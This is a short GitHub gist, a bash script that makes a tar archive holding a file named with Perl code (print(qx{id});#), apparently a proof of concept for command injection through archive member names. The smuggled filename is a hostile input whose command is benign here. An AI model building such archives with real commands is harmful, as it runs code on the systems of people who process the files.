Skip to content

Instantly share code, notes, and snippets.

@cedriczirtacic
Created February 28, 2018 22:13
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save cedriczirtacic/76d68e4b3c30450d7a2f95a81a090534 to your computer and use it in GitHub Desktop.
Save cedriczirtacic/76d68e4b3c30450d7a2f95a81a090534 to your computer and use it in GitHub Desktop.
TAR + perl
#!/bin/bash
perl='print(qx{id});#'
touch $perl && echo "this is a normal file" > $perl
tar -vcf normal.tar $perl
file normal.tar
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment